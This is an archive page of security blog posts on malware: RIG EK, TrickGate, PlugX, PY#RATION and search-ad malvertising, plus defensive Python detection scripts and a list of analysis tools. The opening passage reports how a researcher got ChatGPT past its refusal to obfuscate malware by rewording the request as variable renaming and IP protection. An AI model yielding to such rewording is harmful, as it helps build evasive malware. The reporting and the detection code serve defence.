    6. The next change he asked ChatGPT to make was to obfuscate the code, which was rejected. Once ChatGPT rejected his request, he tried again. By altering his request from obfuscating the code to converting all variables to random English first and last names, ChatGPT cheerfully cooperated. As an extra test, he disguised the request to obfuscate as a way to protect the code’s intellectual property. Again, it supplied sample code that obscured variable names and recommended Go modules to construct completely obfuscated code.

    7. In the next step he uploaded the file to VirusTotal to check it again.

    And there we have it; the Zero Day has finally arrived. They were able to construct a very sophisticated attack in a matter of hours by only following the suggestions provided by ChatGPT, which required no coding on their part. They estimate that it would take a team of five to ten malware developers a few weeks to do the same amount of work without the assistance of an AI-based chatbot, particularly if they wanted to avoid detection by all detection-based vendors.

    ChatGPT for Startups


    Tags: ChatGPT malware


    Mar 28 2023

    What is Malware and how to prevent it

    Category: MalwareDISC @ 10:15 am

    How to recognize and remove malware

    Malware comes in many forms: the unwanted programs can surface as pathogens, spies, or remote controls in computers. Whether it’s a virus, spyware, or a Trojan horse, this harmful software should be kept well away from your computer. What are the different types of malware? We show you how to protect yourself from them and what steps to take if your computer or webspace is affected.

    1. What exactly is malware and what are the different types?
    2. Who is affected by malware and how do you recognize an attack?
    3. Preventative measures against malware
    4. Use internet applications wisely
    5. How to remove spyware, Trojans, viruses, etc.
    6. Malware on websites
    7. Never underestimate the dangers of malicious software

    Source:

    https://www.ionos.com/digitalguide/server/security/how-to-recognize-and-remove-malware/


    Tags: Malware prevention


    Feb 27 2023

    Researchers Share New Insights Into RIG Exploit Kit Malware’s Operations

    Category: MalwareDISC @ 1:09 pm

    The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal.

    “RIG EK is a financially-motivated program that has been active since 2014,” Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News.

    “Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates.”

    Exploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers.

    The fact that RIG EK runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scale coverage.

    As a result, visitors using a vulnerable version of a browser to access an actor-controlled web page or a compromised-but-legitimate website are redirected using malicious JavaScript code to a proxy server, which, in turn, communicates with an exploit server to deliver the appropriate browser exploit.

    The exploit server, for its part, detects the user’s browser by parsing the User-Agent string and returns the exploit that “matches the pre-defined vulnerable browser versions.”

    “The artful design of the Exploit Kit allows it to infect devices with little to no interaction from the end user,” the researchers said. “Meanwhile, its use of proxy servers makes infections harder to detect.”

    Since arriving on the scene in 2014, RIG EK has been observed delivering a wide range of financial trojans, stealers, and ransomware such as AZORult, CryptoBit, Dridex, Raccoon Stealer, and WastedLoader. The operation was dealt a huge blow in 2017 following a coordinated action that dismantled its infrastructure.

    For more details:

    https://thehackernews.com/2023/02/researchers-share-new-insights-into-rig.html

    Tags: Exploit Kit, Malware Analysis


    Feb 03 2023

    MAJORITY OF THE RANSOMWARE GANGS USED THIS PACKER TO BYPASS ANTIVIRUS AND ENCRYPT DEVICES

    Category: Malware,RansomwareDISC @ 11:02 am

    Packers are becoming an increasingly important tool for cybercriminals. On hacker forums, a packer is sometimes referred to as a “Crypter” or “FUD.” Its primary function is to make it more difficult for antivirus systems to identify malicious code. Malicious actors are able to disseminate their malware more quickly and with fewer consequences when they use a packer. One of the primary qualities of a commercial Packer-as-a-Service is that it is payload-agnostic: it can be used to pack a variety of different harmful samples, which opens up a lot of opportunities for cybercriminals. Another key quality of the packer is that it is transformational: because the packer’s wrapper is changed frequently, it is able to avoid detection by security products.

    According to Checkpoint, TrickGate is an excellent illustration of a robust and resilient packer-as-a-service. It has been able to go under the radar of cyber security researchers for a number of years and is consistently becoming better in a variety of different ways.

    Although a lot of very good research has been done on the packer itself, TrickGate is a master of disguise and has been given a number of different names due to its many different characteristics, including “TrickGate,” “Emotet’s packer,” “new loader,” “Loncom,” and “NSIS-based crypter.”

    At the end of 2016, they made their first observation of TrickGate. At that time, it was used to spread the Cerber malware. Since then, they have been doing ongoing research on TrickGate and have discovered that it is used to propagate many forms of malicious software, including ransomware, RATs, information stealers, bankers, and miners. It has come to their attention that a significant number of APT groups and threat actors often employ TrickGate to wrap their malicious code in order to evade detection by security solutions. Some of the most well-known and widely distributed malware families have been wrapped by TrickGate, including Cerber, Trickbot, Maze, Emotet, REvil, CoinMiner, Cobalt Strike, DarkVNC, BuerLoader, HawkEye, NetWire, AZORult, Formbook, Remcos, Lokibot, AgentTesla, and many more.
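The post explains that a packer replaces readable code with a wrapper that security products do not recognise. One static signal analysts use to spot this is byte entropy: compressed or encrypted payload regions approach 8 bits per byte, while plain code and strings sit well below. The following is an added example written for this page, not Check Point's TrickGate analysis code; the sample file image it scans is constructed in the block (a low-entropy text "stub" followed by seeded pseudo-random "packed" bytes), and the window size and threshold are assumptions.

```python
"""Shannon-entropy heuristic for spotting packed or encrypted regions in a file.

Added example; not Check Point's tooling. A packer leaves a small plaintext
stub and a high-entropy blob, so scanning fixed windows shows where the
payload sits. Legitimate compressed resources (images, installers) also score
high, so treat this as a triage signal rather than proof of packing.
"""
import math
import random
from collections import Counter

WINDOW = 1024      # assumption: bytes per window
THRESHOLD = 7.0    # assumption: bits/byte above which a window is "packed-looking"


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for one repeated value, 8.0 for a flat distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def window_entropies(data: bytes, window: int = WINDOW) -> list:
    """(offset, entropy) for every full window; a short trailing fragment is skipped."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data) - window + 1, window)]


def high_entropy_windows(data: bytes, window: int = WINDOW, threshold: float = THRESHOLD) -> list:
    """Windows at or above the threshold, as (offset, entropy rounded to 2 places)."""
    return [(off, round(e, 2)) for off, e in window_entropies(data, window) if e >= threshold]


def packed_fraction(data: bytes, window: int = WINDOW, threshold: float = THRESHOLD) -> float:
    """Share of windows that look packed; 1.0 means the whole file is opaque."""
    ents = window_entropies(data, window)
    if not ents:
        return 0.0
    return sum(1 for _, e in ents if e >= threshold) / len(ents)


def constructed_sample() -> bytes:
    """Constructed file image, not a real binary: 2048 bytes of text then 4096 seeded random bytes."""
    rng = random.Random(1337)  # seeded so the demo is reproducible
    stub = (b"This stub unpacks the real payload at run time. " * 64)[:2048]
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    return stub + packed


if __name__ == "__main__":
    sample = constructed_sample()
    for off, e in window_entropies(sample):
        print(f"offset {off:6d}  entropy {e:.2f}  {'PACKED?' if e >= THRESHOLD else ''}")
    print(f"packed fraction: {packed_fraction(sample):.2f}")
```

Run it against a real file by replacing `constructed_sample()` with the file's bytes; on a PE you would normally compute this per section rather than per fixed window, but the scoring is the same.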

    Tags: BYPASS ANTIVIRUS AND ENCRYPT DEVICES


    Jan 28 2023

    PlugX Malware Sneaks Onto Windows PCs Through USB Devices

    Category: Malware,Windows SecurityDISC @ 9:29 am

    PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups.

    The Palo Alto Networks Unit 42 incident response team has discovered a new variant of PlugX malware that is distributed via removable USB devices and targets Windows PCs. This should not come as a surprise since 95.6% of new malware or their variants in 2022 targeted Windows.

    According to Unit 42 researchers, the new variant was detected when carrying out an incident response post a Black Basta ransomware attack. The researchers uncovered several malware samples and tools on the victims’ devices. This includes the Brute Ratel C4 red-teaming tool, GootLoader malware, and an old PlugX sample.

    PlugX malware has been around for almost a decade and has been used by multiple actors of Chinese nexus and several other cybercrime groups. The malware was previously used in many high-profile cyberattacks, such as the 2015 U.S. Government Office of Personnel Management (OPM) breach.

    The same backdoor was also used in the 2018 malware attack on the Android devices of minority groups in China. Most recently, in November 2022, researchers linked Google Drive phishing scams to the group infamously known for using PlugX malware.

    Scope of Infection

    The new variant stood out among other malware because it could infect any attached removable USB device, e.g., floppy, flash, thumb drives, and any system the removable device was plugged into later.

    So far, no evidence connects the PlugX backdoor or Gootkit to the Black Basta ransomware group, and researchers believe another actor could have deployed it. Moreover, researchers noted that the malware could copy all Adobe PDF and Microsoft Word documents from the host and place them in a hidden folder on the USB device, which the malware itself creates.

    PlugX Malware Being Distributed through Removable USB Devices

    Malware Analysis

    Unit 42 researchers Jen Miller-Osborn and Mike Harbison explained in their blog post that this variant of PlugX malware is a wormable, second-stage implant. It infects USB devices and stays concealed from the Windows file system. The user would not suspect that their USB device is being exploited to exfiltrate data from networks.

    PlugX’s USB variant is different because it uses a specific Unicode character, the non-breaking space (U+00A0), to hide files on a USB device plugged into a workstation. This character prevents Windows from rendering the directory name, leaving a nameless folder in Explorer instead.

    Furthermore, the malware can hide actor files on a removable USB device through a novel technique, which even works on the latest Windows OS.

    The malware is designed to infect the host and copy the malicious code onto any removable device connected to it, hiding the code in a recycle bin folder. Since Windows does not show hidden files by default, the malicious files in the recycle bin folder are not displayed; surprisingly, they are not shown even with the relevant settings enabled. These malicious files can be viewed or downloaded only on a Unix-like OS or by mounting the USB device in a forensic tool.
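The hiding trick described above (a directory whose name is a single non-breaking space, with the victim's PDF and Word documents staged beneath it) is easy to check for from a Unix-like host, which is where the post says the files are visible. The following is an added example written for this page, not Unit 42's code: it walks a mount point, flags directories whose names consist only of blank-rendering Unicode characters (U+00A0 among them), and lists the documents under each. The demo directory tree and file contents are constructed in the block.

```python
"""Flag directory names that render as blank (e.g. U+00A0) on a mounted USB drive.

Added example for this post; not Unit 42's tooling. Run it from a Unix-like host
where the device is mounted. Paths and sample files below are constructed.
"""
import os
import tempfile
import unicodedata

# Unicode categories whose characters draw nothing a user would notice in
# Explorer: space separators (NBSP is "Zs"), format characters (zero-width
# joiners, BOM are "Cf") and control characters ("Cc").
BLANK_CATEGORIES = {"Zs", "Cf", "Cc"}
DOC_EXTS = {".pdf", ".doc", ".docx"}


def is_blank_name(name: str) -> bool:
    """True when every code point in the name belongs to a blank-rendering category."""
    return bool(name) and all(unicodedata.category(ch) in BLANK_CATEGORIES for ch in name)


def scan_mount(root: str) -> list:
    """Walk the mount and report blank-named directories with the documents stored under them."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            if not is_blank_name(d):
                continue
            full = os.path.join(dirpath, d)
            docs = []
            for sub, _, files in os.walk(full):
                docs.extend(os.path.join(sub, f) for f in files
                            if os.path.splitext(f)[1].lower() in DOC_EXTS)
            findings.append({
                "path": full,
                "codepoints": [f"U+{ord(ch):04X}" for ch in d],
                "documents": sorted(docs),
            })
    return findings


def build_demo_tree() -> str:
    """Constructed layout, not a real infection: a normal folder plus one NBSP-named folder holding a PDF."""
    root = tempfile.mkdtemp(prefix="usb_demo_")
    os.makedirs(os.path.join(root, "Photos"))
    with open(os.path.join(root, "Photos", "beach.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # constructed JPEG header bytes only
    hidden = os.path.join(root, "\u00a0")  # the name is a single non-breaking space
    os.makedirs(os.path.join(hidden, "staging"))
    with open(os.path.join(hidden, "staging", "quarterly.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed sample\n")
    return root


if __name__ == "__main__":
    for finding in scan_mount(build_demo_tree()):
        print(finding["path"], finding["codepoints"], finding["documents"])
```

Point `scan_mount` at the real mount point (for example `/media/usb`) instead of the demo tree; the code-point list in each finding is what you would put in the incident report, since the path itself prints as blank.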

    Mastering Windows Security and Hardening: Secure and protect your Windows environment from intruders, malware attacks, and other cyber threats


    Tags: PlugX Malware


    Jan 27 2023

    New Python Malware Targeting Windows Devices

    Category: Malware,PythonDISC @ 10:26 am

    The malware features also include file transfer, keylogging, stealing passwords stored in the browser, clipboard data stealing, cookies exfiltration and more.

    Threat analysis firm Securonix’s cybersecurity researchers have discovered a new malware dubbed PY#RATION allowing attackers to steal sensitive files and log keystrokes from impacted devices.

    Malware Distribution Technique

    The malware is distributed through a conventional phishing mechanism in which the email contains a password-protected ZIP archive. When it is unpacked, two shortcut files disguised as images appear, titled front.jpg.lnk and back.jpg.lnk. When launched, these files display the front and back of a driver’s license that doesn’t exist.

    Images used in the scam (Credit: Securonix)

    With this, the malicious code is also executed, leading to two new files being downloaded from the internet. These files are titled front.txt and back.txt, later renamed to .bat files and executed. The malware disguises itself as the Cortana virtual assistant to ensure persistence on the system.
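The lure relies on a double extension (an image name ending in .lnk) inside an archive. In the standard ZIP format the entry names in the central directory are stored in clear even when the contents are password-protected, so a mail gateway or triage script can flag such names without knowing the password. The following is an added example written for this page, not Securonix's tooling; the archive it scans is constructed in memory with the entry names from the report and dummy contents.

```python
"""Inspect ZIP entry names for shortcut files masquerading as images or documents.

Added example; not Securonix's code. Entry names are readable without the
archive password, so this check works on password-protected lures too.
"""
import io
import zipfile
from typing import Optional

SHORTCUT_EXTS = {".lnk", ".url"}                              # Windows shortcut types
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".pdf", ".doc", ".docx", ".txt"}


def classify_entry(name: str) -> Optional[str]:
    """Return a finding label for a suspicious entry name, or None if it looks ordinary."""
    base = name.rsplit("/", 1)[-1].lower()   # ZIP paths use forward slashes
    parts = base.split(".")
    if len(parts) < 2:
        return None
    ext = "." + parts[-1]
    if ext not in SHORTCUT_EXTS:
        return None
    # "front.jpg.lnk": the part before the real extension pretends to be an image/document.
    if len(parts) >= 3 and "." + parts[-2] in DECOY_EXTS:
        return "shortcut-with-decoy-extension"
    return "shortcut-in-archive"


def scan_archive(data: bytes) -> list:
    """List (entry name, label) for every suspicious entry in the archive bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            label = classify_entry(info.filename)
            if label:
                findings.append((info.filename, label))
    return findings


def build_sample_archive() -> bytes:
    """Constructed lure archive using the names from the report; contents are placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("front.jpg.lnk", b"constructed placeholder, not a real shortcut")
        zf.writestr("back.jpg.lnk", b"constructed placeholder, not a real shortcut")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, label in scan_archive(build_sample_archive()):
        print(f"{label:32s} {entry}")
```

To use it on a real attachment, pass the raw bytes of the .zip to `scan_archive`; any `shortcut-with-decoy-extension` hit is worth quarantining before a user ever sees the "image".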

    What is PY#RATION

    PY#RATION is a Python-based malware that displays a RAT (remote access trojan) like behaviour to sustain control over the affected host. The malware has various capabilities and functionalities, such as keylogging and data exfiltration.

    However, the unique aspect is that it uses WebSocket for exfiltration and C2 communication, and evades detection from network security solutions and antivirus programs. Leveraging Python’s built-in Socket.IO framework that facilitates client and server WebSocket communications, the malware pulls data and gets commands over a single TCP connection through open ports simultaneously.

    Moreover, according to a blog post published by Securonix, the attackers use the same C2 address, which the IPVoid checking system is yet to block. Researchers believe this malware is still under active development as they have detected multiple versions since August 2022. The malware receives instructions from the operators through WebSocket and obtains sensitive data.

    Potential Dangers

    This Python RAT is packed into an executable that uses automated packers such as ‘pyinstaller’ and ‘py2exe’ to convert Python code into Windows executables. This helps inflate payload size (The first detected version 1.0 being 14MB and the last detected version 1.6.0 being 32 MB containing 1000+ lines and additional code).

    Infection chain of the PY#RATION python malware (Credit: Securonix)

    Researchers claim that the latest version of the payload remains undetected by all except for one antivirus engine listed on VirusTotal.

    The malware features include file transfer to and from the C2 server, network enumeration, shell command execution, keylogging, stealing passwords stored in the browser, host enumeration, clipboard data stealing, and cookies exfiltration. Who’s behind this campaign, the distribution volume, and campaign objectives are still unclear.

    Python for Cybersecurity: Using Python for Cyber Offense and Defense



    Tags: Python Malware


    Jan 19 2023

    Google ads increasingly pointing to malware

    Category: MalwareDISC @ 11:13 am

    The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing.

    The recent explosion of search engine malvertising

    Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users:

    The latter tactic is particularly good at hitting a wide pool of potential targets, since most internet users also use search engines.

    Lately, though, they have been overdoing it – or perhaps it’s just that more people have begun noticing it and talking about it online?

    Many documented campaigns

    HP threat researcher Patrick Schläpfer says that they have seen “a significant increase in malware distributed through malvertising, with multiple threat actors currently using this technique.”

    Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.).


    The malicious ads often manage to be the first link users see when searching for software on Google, and point to a (usually typosquatting) domain that resembles the original software manufacturer’s page. Clicking on the download link triggers the download of the malicious package from a file-hosting and sharing service (e.g., Dropbox), an app development platform (e.g., Google Firebase), or a code-hosting service (e.g., GitHub).

    Protect yourself and your loved ones

    While Google and Microsoft are trying to keep their users safe, it’s becoming obvious that they are failing to keep pace with the rapid change of tricks employed by cybercriminals to push those ads.

    As some ads are removed and new ones inevitably spring up, users are forced to do what they can to protect themselves.

    Just being aware of this danger and knowing about the prevalence of these malicious ads will help. Also, carefully check whether the URL to which the advertisement points is the correct one (e.g., by comparing it with the official domain listed on the software’s Wikipedia page).
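The check suggested above, comparing the advertised URL against the software's official domain, can be automated for a download allowlist. The following is an added example written for this page, not from the article or any vendor: it extracts the registrable part of the link's host, compares it with an assumed allowlist of official domains, and flags near-misses by edit distance (typosquats) and by reuse of the brand name under a different domain (the "gimp-download" style of lookalike). The allowlist, the two-label "registrable domain" shortcut and the thresholds are assumptions.

```python
"""Check whether a download link's host matches the software's official domain.

Added example, not the article's code. Flags typosquats and brand-reuse
lookalikes against a small constructed allowlist.
"""
from urllib.parse import urlsplit

# Assumption: an allowlist you maintain, mapping product -> official download domain.
OFFICIAL = {
    "notepad-plus-plus": "notepad-plus-plus.org",
    "gimp": "gimp.org",
    "blender": "blender.org",
    "audacity": "audacityteam.org",
}
MAX_EDITS = 2  # assumption: hosts within this many edits of the real one are treated as typosquats


def registrable(host: str) -> str:
    """Last two labels of the host. Assumption: no multi-part public suffixes such as co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute), row-by-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_download_url(url: str, product: str) -> str:
    """Return 'official', a 'lookalike: ...' explanation, or 'unrelated: ...'."""
    official = OFFICIAL[product]
    host = urlsplit(url).hostname or ""
    dom = registrable(host)
    if dom == official:
        return "official"
    brand = official.split(".")[0]
    if levenshtein(dom, official) <= MAX_EDITS:
        return f"lookalike: {dom} is within {MAX_EDITS} edits of {official}"
    if brand in dom:
        return f"lookalike: {dom} reuses brand '{brand}' under a different domain"
    return f"unrelated: {dom} is not {official}"


if __name__ == "__main__":
    # Constructed sample links; none of these domains is asserted to be malicious in reality.
    for url, product in [
        ("https://www.gimp.org/downloads/", "gimp"),
        ("https://gimp-download.net/setup.exe", "gimp"),
        ("https://notepad-plus-plus.co/download", "notepad-plus-plus"),
        ("https://girnp.org/setup", "gimp"),
        ("https://example.com/gimp", "gimp"),
    ]:
        print(f"{url:45s} -> {check_download_url(url, product)}")
```

The edit-distance test catches swapped or dropped characters; the brand-substring test catches the longer "brand-download.net" pattern that edit distance misses. Internationalised hostnames arrive in their encoded form, so a homograph would show up as a large edit distance rather than a small one; treat any non-official result as a reason to type the vendor's address yourself.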

    If you fail to spot the malicious nature of the ad and the typosquatting site, don’t ignore warnings you might get from Microsoft Defender or another security solution you use.


    But the best advice may be to completely avoid clicking on Google and Bing ads – either by recognizing them and avoiding them consciously, or by installing an ad-blocking extension that will stop those ads from being displayed. That latter option is perhaps the best one for less tech-savvy users, to completely remove the temptation of willy-nilly clicking on potentially malicious ads – wherever they might pop up.

    Google and Microsoft, on the other hand, may want to ramp up their efforts to block this kind of abuse of their ad networks, or risk their reputation being dented and more and more users turning to ad blockers.

    Learn Malware Removal Techniques: How to remove malwares from a computer



    Tags: Google ads


    Jan 07 2023

    Best Malware Analysis Tools List For Security Researchers & Malware Analyst 2023

    Category: Malware,Security ToolsDISC @ 1:24 pm

    Malware analysis tools are highly essential for Security Professionals who always need to learn many tools, techniques, and concepts to analyze sophisticated Threats and current cyber attacks.

    Most Important Security Tools and Resources For Security Researcher and Malware Analyst

    Malware Analysis Tools & Courses

    • Malware Analysis Courses
    • Hex Editors
    • Disassemblers
    • Detection and Classification
    • Dynamic Binary Instrumentation
    • Dynamic Analysis
    • Deobfuscation
    • Debugging
    • Malware Analysis Courses
    • Reverse Engineering
    • Binary Analysis
    • Decompiler
    • Bytecode Analysis
    • Reconstruction
    • Memory Forensics
    • Windows Artifacts
    • Storage and Workflow
    • Malware samples
    • Courses
    • Domain Analysis
    • Books

    Malware Analysis Courses

    Here we have listed the best courses for malware analysis, reverse engineering, exploit development and more.

    Hex Editors

    A hex editor (or binary file editor or byte editor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.

    Disassemblers

    A disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler.

    A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

    Detection and Classification

    • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
    • Assemblyline – A scalable distributed file analysis framework.
    • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
    • ClamAV – Open source antivirus engine.
    • Detect-It-Easy – A program for determining types of files.
    • ExifTool – Read, write and edit file metadata.
    • File Scanning Framework – Modular, recursive file scanning solution.
    • hashdeep – Compute digest hashes with a variety of algorithms.
    • Loki – Host based scanner for IOCs.
    • Malfunction – Catalog and compare malware at a function level.
    • MASTIFF – Static analysis framework.
    • MultiScanner – Modular file scanning/analysis framework.
    • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
    • packerid – A cross-platform Python alternative to PEiD.
    • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
    • Rootkit Hunter – Detect Linux rootkits.
    • ssdeep – Compute fuzzy hashes.
    • totalhash.py – Python script for easy searching of the TotalHash.cymru.com database.
    • TrID – File identifier.
    • YARA – Pattern matching tool for analysts.
    • Yara rules generator – Generate YARA rules based on a set of malware samples. Also contains a good strings DB to avoid false positives.

    Dynamic Binary Instrumentation

    Dynamic Binary Instrumentation Tools

    Mac Decrypt

    Mac Decrypting Tools

    Emulator

    Emulator Tools

    Document Analysis

    Document Based Malware Analysis Tools.

    Dynamic Analysis

    This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

    The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding

    Deobfuscation Malware Analysis Tools

    Reverse XOR and other code obfuscation methods.

    • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
    • de4dot – .NET deobfuscator and unpacker.
    • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
    • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
    • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
    • PackerAttacker – A generic hidden code extractor for Windows malware.
    • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
    • unxor – Guess XOR keys using known-plaintext attacks.
    • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
    • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
    • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
    • xortool – Guess XOR key length, as well as the key itself.
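The key-recovery idea behind NoMoreXOR, unxor and xortool, shown as an added Python example (this is not code from any of those tools): because 0x00 is by far the most common byte in a Windows PE, the most frequent ciphertext byte in each key column XOR 0x00 is the key byte for that column, and the DOS stub string confirms the right key length. The fake PE bytes and the key below are constructed for the demonstration.

```python
from collections import Counter
from typing import Optional

# The DOS stub message present in almost every Windows PE: a reliable known plaintext.
KNOWN_PLAINTEXT = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def derive_key_by_frequency(data: bytes, key_len: int, expected_byte: int = 0x00) -> bytes:
    """Assume the most frequent plaintext byte in every key column is `expected_byte`
    (0x00 dominates PE files because of padding and zeroed header fields); the key
    byte for a column is then its most frequent ciphertext byte XOR expected_byte."""
    key = bytearray()
    for pos in range(key_len):
        column = data[pos::key_len]
        most_common_byte, _ = Counter(column).most_common(1)[0]
        key.append(most_common_byte ^ expected_byte)
    return bytes(key)


def recover_xor_key(data: bytes, max_key_len: int = 16, known: bytes = KNOWN_PLAINTEXT) -> Optional[bytes]:
    """Try key lengths from 1 upward and accept the first key whose decryption
    contains the known plaintext. Returns None if no candidate length works."""
    for key_len in range(1, max_key_len + 1):
        key = derive_key_by_frequency(data, key_len)
        if known in xor_bytes(data, key):
            return key
    return None


# Constructed stand-in for the start of a PE: header fields, padding zeros, DOS stub text, more zeros.
SAMPLE_PLAINTEXT = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\x00" * 112
    + b"This program cannot be run in DOS mode.\r\n$"
    + b"\x00" * 200
    + b"PE\x00\x00"
)
SAMPLE_KEY = b"\x4b\x13\xa7\x5c"          # constructed 4-byte key
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    recovered = recover_xor_key(SAMPLE_CIPHERTEXT)
    print("recovered key:", recovered.hex() if recovered else None)
    print("decrypted header starts with:", xor_bytes(SAMPLE_CIPHERTEXT, recovered)[:2])
```

The frequency assumption fails on ciphertexts with little structure (compressed or already-encrypted data), which is why the known-plaintext check is kept as a second, independent confirmation rather than trusting the statistics alone.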

    Debugging

    In this list we can see disassemblers, debuggers, and other static and dynamic analysis tools.

    Cross-Platform Debugging Tools

    Windows-Only Debugging Tools

    Linux-Only Debugging Tools

    Reverse Engineering 

    • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
    • bamfdetect – Identifies and extracts information from bots and other malware.
    • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
    • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
    • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
    • Binary ninja – A reversing engineering platform that is an alternative to IDA.
    • Binwalk – Firmware analysis tool.
    • Bokken – GUI for Pyew and Radare. (mirror)
    • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
    • codebro – Web based code browser using clang to provide basic code analysis.
    • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based on QEMU. DroidScope is now an extension to DECAF.
    • dnSpy – .NET assembly editor, decompiler and debugger.
    • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
    • Fibratus – Tool for exploration and tracing of the Windows kernel.
    • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
    • GDB – The GNU debugger.
    • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
    • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
    • Hopper – The macOS and Linux Disassembler.
    • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
    • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
    • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
    • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
    • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
    • ltrace – Dynamic analysis for Linux executables.
    • objdump – Part of GNU binutils, for static analysis of Linux binaries.
    • OllyDbg – An assembly-level debugger for Windows executables.
    • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
    • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
    • pestudio – Perform static analysis of Windows executables.
    • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
    • plasma – Interactive disassembler for x86/ARM/MIPS.
    • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
    • Process Explorer – Advanced task manager for Windows.
    • Process Hacker – Tool that monitors system resources.
    • Process Monitor – Advanced monitoring tool for Windows programs.
    • PSTools – Windows command-line tools that help manage and investigate live systems.
    • Pyew – Python tool for malware analysis.
    • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
    • QKD – QEMU with embedded WinDbg server for stealth debugging.
    • Radare2 – Reverse engineering framework, with debugger support.
    • RegShot – Registry compare utility that compares snapshots.
    • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
    • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
    • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analysis.
    • strace – Dynamic analysis for Linux executables.
    • Triton – A dynamic binary analysis (DBA) framework.
    • Udis86 – Disassembler library and tool for x86 and x86_64.
    • Vivisect – Python tool for malware analysis.
